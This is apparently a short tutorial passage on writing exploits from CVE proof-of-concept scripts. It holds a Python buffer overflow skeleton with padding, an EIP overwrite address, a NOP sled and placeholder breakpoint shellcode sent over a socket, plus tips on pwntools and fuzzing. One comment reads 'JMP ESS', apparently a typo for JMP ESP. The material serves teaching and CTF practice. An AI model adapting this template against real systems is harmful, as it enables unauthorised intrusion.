When a new CVE drops, there is no Metasploit module yet. There is usually a crude Python script ("Proof of Concept"). Understanding how to read, modify, and improve these scripts is a critical skill.
# Basic Buffer Overflow Skeleton
import socket
target = "192.168.1.10"
port = 9999
# EIP Overwrite Pattern
padding = b"A" * 2000
eip = b"\xaf\x11\x50\x62" # Memory address of JMP ESS
nop_sled = b"\x90" * 32
shellcode = b"\xcc\xcc\xcc" # INT3 Breakpoint
payload = padding + eip + nop_sled + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(payload)
Pwntools
Don't write raw sockets for CTFs. Use pwntools.
It handles endianness (`p32(0xdeadbeef)`), SSH connections, and GDB debugging automatically.
It makes exploit development 10x faster.
1. Fuzzing
Before you can write an exploit, you must find the bug.
Write a Python script to send random garbage to the target application until it crashes.
Then analyze the crash dump to see if you control the Instruction Pointer (EIP).